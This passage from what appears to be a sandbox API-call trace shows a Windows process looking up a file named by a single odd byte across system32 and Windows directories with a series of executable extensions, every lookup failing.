ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.COM" (normalized: "c:\\windows\\system32\\\x9f.com"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.303] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.EXE" (normalized: "c:\\windows\\system32\\\x9f.exe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.304] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.BAT" (normalized: "c:\\windows\\system32\\\x9f.bat"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.CMD" (normalized: "c:\\windows\\system32\\\x9f.cmd"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.306] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.VBS" (normalized: "c:\\windows\\system32\\\x9f.vbs"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.VBE" (normalized: "c:\\windows\\system32\\\x9f.vbe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.308] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.JS" (normalized: "c:\\windows\\system32\\\x9f.js"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.309] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.JSE" (normalized: "c:\\windows\\system32\\\x9f.jse"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.WSF" (normalized: "c:\\windows\\system32\\\x9f.wsf"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.WSH" (normalized: "c:\\windows\\system32\\\x9f.wsh"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.MSC" (normalized: "c:\\windows\\system32\\\x9f.msc"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.314] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f.CPL" (normalized: "c:\\windows\\system32\\\x9f.cpl"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.314] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.315] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\\x9f" (normalized: "c:\\windows\\system32\\\x9f"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.315] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0280.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0280.315] FindFirstFileW (in: lpFileName="C:\\Windows\\\x9f.ps1" (normalized: 